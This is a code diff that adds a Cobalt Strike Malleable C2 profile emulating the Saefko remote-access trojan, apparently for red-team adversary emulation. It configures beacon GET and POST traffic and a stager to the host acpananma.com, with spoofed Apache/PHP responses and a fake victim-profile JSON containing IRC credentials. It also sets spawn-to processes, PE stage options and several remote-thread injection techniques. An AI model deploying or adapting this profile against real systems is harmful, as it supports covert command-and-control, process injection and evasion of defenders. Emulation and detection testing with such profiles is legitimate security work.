Create saefko.profile

crimeware/saefko.profile

@@ -0,0 +1,213 @@
+#saefko.profile
+#https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat
+#xx0hcd
+
+###global options###
+set sleeptime "5000";
+set jitter    "33";
+set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38";
+
+set sample_name "saefko.profile";
+
+http-get {
+
+    set uri "/love/server.php";
+
+    set verb "GET";
+    
+    client {
+
+        header "Host" "acpananma.com";
+
+	   
+        metadata {
+            base64url;
+            parameter "pass";
+        }
+
+        parameter "command" "UpdateHTTPIRCStatus";
+        parameter "machine_id" "202";
+        parameter "irc_status" "1";
+
+    }
+
+    server {
+        header "Server" "Apache";
+        header "X-Powered-By" "PHP/5.6.36";
+        header "Vary" "Accept-Encoding";
+        header "Content-Type" "text/html; charset=UTF-8";
+        
+        output {
+
+            netbios;
+            	     
+	    prepend "ok\n";
+        prepend "2\n";
+
+	    append "0\n";
+
+            print;
+        }
+    }
+}
+
+http-post {
+    
+    set uri "/Love/server.php";
+    #set verb "GET";
+    set verb "POST";
+
+    client {
+
+    header "Content-Type" "application/x-www-form-urlencoded";
+	header "Host" "acpananma.com";
+    header "Expect" "100-continue";
+	header "Connection" "Keep-Alive";
+         
+        
+        output {
+            base64url;
+            parameter "command";
+
+        }
+
+        id {
+	        base64url;
+	        parameter "pass";
+          
+        }
+
+    }
+
+    server {
+        header "Host" "acpananma.com";
+
+        output {
+            netbios;	    
+	   
+	    prepend "\nHTTP/1.1 100 Continue\n\n";
+
+        #checked to make sure the misspells were misspelled, uh, correctly?
+        append "irc_channel\":\"null\",\"irc_nickname\":\"jI87fg\",\"irc_password\":\"K8gtr$4\",\"irc_port\":\"6669\",\"irc_server\":\"Setting+up+IRC+service.\",\"machine_active_time\":\"12\",\"machine_artct\":\"x86\",\"machine_bitcoin_value\":\"0\",\"machine_business_value\":\"0\",\"machine_calls_activity\":\"0\",\"machine_camera_activity\":\"8\",\"machine_country_iso_code\":\"8864\",\"machine_creadit_card_posiblty\":\"0\",\"machine_current_time\":\"10:32:45\",\"machine_facebook_activity\":\"0\",\"machine_gaming_value\":\"0\",\"machine_gmail_avtivity\":\"0\",\"machine_googlepluse_activity\":\"0\",\"machine_instgram_activity\":\"0\",\"machine_ip\":\"10.1.23.146\",\"machine_lat\":\"0\",\"machine_lng\":\"eng\",\"machine_os_type\":\"win\",\"machine_register_date\":\"0222\",\"machine_screenshot\":\"1";
+            print;
+        }
+    }
+}
+
+http-stager {
+
+    set uri_x86 "/clients2.google.com/generate_204";
+    set uri_x64 "/clients3.google.com/generate_204";
+
+    client {
+
+        header "Host" "acpananma.com";
+
+    }
+
+    server {
+        header "Server" "Apache";
+        header "X-Powered-By" "PHP/5.6.36";
+        header "Vary" "Accept-Encoding";
+        header "Content-Type" "text/html; charset=UTF-8";
+    
+        output{
+            prepend "ok\n";
+            prepend "2\n";
+
+	        append "0\n";
+            print;
+        }
+
+    }
+
+
+}
+
+
+
+
+###Malleable PE Options###
+
+post-ex {
+
+    set spawnto_x86 "%windir%\\syswow64\\wscript.exe";
+    set spawnto_x64 "%windir%\\sysnative\\wscript.exe";
+
+    set obfuscate "false";
+
+    set smartinject "false";
+
+    set amsi_disable "false";
+
+}
+
+#used peclone on sample from https://app.any.run/tasks/54fe7d78-91d9-4d45-8b65-7333c2c7d480/
+stage {
+    set checksum        "0";
+    set compile_time    "12 Feb 2019 14:33:03";
+    set entry_point     "159022";
+    set image_size_x86  "548864";
+    set image_size_x64  "548864";
+    #set name	        "";
+    set userwx 	        "false";
+    set cleanup	        "false";
+    set stomppe         "false";
+    set obfuscate       "false";
+    set rich_header     "";
+    
+    set sleep_mask "false";
+
+#    set module_x86 "";
+#    set module_x64 "";
+
+    transform-x86 {
+#        prepend "\x90\x90\x90";
+#        strrep "ReflectiveLoader" "6ayBRVW";
+#        strrep "beacon.dll" "uVRWRut";
+        }
+
+    transform-x64 {
+#        prepend "\x90\x90\x90";
+#        strrep "ReflectiveLoader" "6ayBRVW";
+#        strrep "beacon.x64.dll" "uVRWRut";
+        }
+
+#can set a string in the .rdata section of the beacon dll.
+    #adds a zero-terminated string
+    #string "something";
+
+    #adds a string 'as-is'
+    #data "something";
+
+    #adds a wide (UTF-16LE encoded) string
+    #stringw "IMAGE_SCN_MEM_READ"; 
+}
+
+
+#controls process injection behavior
+process-inject {
+
+#    set allocator "NtMapViewOfSection";		
+
+#    set min_alloc "16700";
+
+    set userwx "false";  
+    
+    set startrwx "true";
+        
+    transform-x86 {
+#        prepend "\x90\x90\x90";
+    }
+    transform-x64 {
+#        prepend "\x90\x90\x90";
+    }
+
+    execute {
+#        CreateThread "ntdll!RtlUserThreadStart";
+        CreateThread;
+        NtQueueApcThread;
+        CreateRemoteThread;
+        RtlCreateUserThread;
+    }
+}